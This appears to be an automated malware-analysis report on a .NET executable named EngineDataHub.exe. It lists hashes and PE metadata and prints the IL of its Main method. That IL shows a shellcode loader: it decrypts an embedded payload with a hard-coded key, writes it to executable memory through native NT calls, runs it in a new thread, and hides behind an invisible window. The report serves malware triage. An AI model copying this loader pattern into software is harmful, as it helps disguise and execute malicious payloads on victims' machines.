Suspicious
Suspect

0052f4f8ce7c45cfd10165ffd8fd044f

PE Executable | MD5: 0052f4f8ce7c45cfd10165ffd8fd044f | Size: 1.25 MB | application/x-dosexec


Characteristics

Symbol Obfuscation Score

Very low

Hash: Hash Value
MD5: 0052f4f8ce7c45cfd10165ffd8fd044f
Sha1: f87080e76461d1a6d144ae205f08dc0ad891e0f1
Sha256: e691dcafd1d329091197791751faf5a54ea531b2314ce60ed962bf82839d3426
Sha384: eec6cce231068adcfba103c7f41edd906f7be869b520419e9dfbbd813a8178f558df0c12bbbc146efcde60046a4297f4
Sha512: 3ce6bed6cd5c72a9ade07a8378d648114c433ea5777d151f04ecd8fdf02189bf994543e99c0cd126470d8217f80319a3c09772a0af50cd46e1245622292b873f
SSDeep: 6144:YQyIx9N6lkOx58ck4LH2f813D5t24jSm9IP9BeVyA/WA5QaUned2woS:YdIx9N6f2E13toxFBeVyA/W4oeE
TLSH: C9451210465A531EDB6AC77A15072FB4576CEC1AEF8783EF9AC9EC203D0A6E00535EE1

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0001
ID:1033
Information
Name: Value
Info: PE Detect: PeReader OK (file layout)
Module Name: EngineDataHub.exe
Full Name: EngineDataHub.exe
EntryPoint: System.Void Stub.Program::Main()
Scope Name: EngineDataHub.exe
Scope Type: ModuleDef
Kind: Windows
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: EngineDataHub
Assembly Version: 1.0.0.0
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: <null>
Total Strings: 19
Main Method: System.Void Stub.Program::Main()
Main IL Instruction Count: 98

Main IL

ldsfld System.Byte[] Stub.Program::EncryptedShellcode
ldstr BjpaPxvkkR/iTWPkap1+KecII9yNyDbNhVtvOs1yhqI=
ldstr BZaXKI3kjCuhPnqen45s5A==
call System.Byte[] Stub.Program::DecryptShellcode(System.Byte[],System.String,System.String)
stloc.0 <null>
ldloc.0 <null>
brfalse.s IL_001D: leave IL_012D
ldloc.0 <null>
ldlen <null>
conv.i4 <null>
brtrue.s IL_0022: ldsfld System.IntPtr System.IntPtr::Zero
leave IL_012D: ret
ldsfld System.IntPtr System.IntPtr::Zero
stloc.1 <null>
ldloca.s V_2
ldloc.0 <null>
ldlen <null>
conv.i4 <null>
newobj System.Void System.IntPtr::.ctor(System.Int32)
stobj System.IntPtr
ldc.i4.m1 <null>
call System.IntPtr System.IntPtr::op_Explicit(System.Int32)
ldloca.s V_1
ldsfld System.IntPtr System.IntPtr::Zero
ldloca.s V_2
ldc.i4 12288
ldc.i4.s 64
call System.UInt32 Stub.Program::NtAllocateVirtualMemory(System.IntPtr,System.IntPtr&,System.IntPtr,System.IntPtr&,System.UInt32,System.UInt32)
pop <null>
ldloc.1 <null>
ldsfld System.IntPtr System.IntPtr::Zero
call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr)
brfalse.s IL_0065: ldloc.0
leave IL_012D: ret
ldloc.0 <null>
ldc.i4.0 <null>
ldloc.1 <null>
ldloc.0 <null>
ldlen <null>
conv.i4 <null>
call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32)
ldloca.s V_3
ldc.i4 2097151
ldsfld System.IntPtr System.IntPtr::Zero
ldc.i4.m1 <null>
call System.IntPtr System.IntPtr::op_Explicit(System.Int32)
ldloc.1 <null>
ldsfld System.IntPtr System.IntPtr::Zero
ldc.i4.0 <null>
ldc.i4.0 <null>
ldc.i4 1048576
ldc.i4 1048576
ldsfld System.IntPtr System.IntPtr::Zero
call System.UInt32 Stub.Program::NtCreateThreadEx(System.IntPtr&,System.UInt32,System.IntPtr,System.IntPtr,System.IntPtr,System.IntPtr,System.Boolean,System.UInt32,System.UInt32,System.UInt32,System.IntPtr)
pop <null>
ldloc.3 <null>
ldsfld System.IntPtr System.IntPtr::Zero
call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr)
brfalse.s IL_00AE: ldloc.3
leave.s IL_012D: ret
ldloc.3 <null>
ldc.i4.0 <null>
ldsfld System.IntPtr System.IntPtr::Zero
call System.UInt32 Stub.Program::NtWaitForSingleObject(System.IntPtr,System.Boolean,System.IntPtr)
pop <null>
ldloc.3 <null>
call System.UInt32 Stub.Program::NtClose(System.IntPtr)
pop <null>
leave.s IL_00C7: call System.Void Stub.Program::ProcessJunkData()
pop <null>
leave.s IL_00C7: call System.Void Stub.Program::ProcessJunkData()
call System.Void Stub.Program::ProcessJunkData()
call System.Void System.Windows.Forms.Application::EnableVisualStyles()
ldc.i4.0 <null>
call System.Void System.Windows.Forms.Application::SetCompatibleTextRenderingDefault(System.Boolean)
newobj System.Void System.Windows.Forms.Form::.ctor()
stloc.s V_4
ldloc.s V_4
ldstr EngineDataHub
callvirt System.Void System.Windows.Forms.Control::set_Text(System.String)
ldloc.s V_4
ldc.i4.0 <null>
callvirt System.Void System.Windows.Forms.Form::set_ShowInTaskbar(System.Boolean)
ldloc.s V_4
ldc.r8 0
callvirt System.Void System.Windows.Forms.Form::set_Opacity(System.Double)
ldloc.s V_4
ldsfld System.EventHandler Stub.Program::CS$<>9__CachedAnonymousMethodDelegate2
brtrue.s IL_011C: ldsfld System.EventHandler Stub.Program::CS$<>9__CachedAnonymousMethodDelegate2
ldnull <null>
ldftn System.Void Stub.Program::<Main>b__0(System.Object,System.EventArgs)
newobj System.Void System.EventHandler::.ctor(System.Object,System.IntPtr)
stsfld System.EventHandler Stub.Program::CS$<>9__CachedAnonymousMethodDelegate2
ldsfld System.EventHandler Stub.Program::CS$<>9__CachedAnonymousMethodDelegate2
callvirt System.Void System.Windows.Forms.Form::add_Load(System.EventHandler)
ldloc.s V_4
call System.Void System.Windows.Forms.Application::Run(System.Windows.Forms.Form)
ret <null>
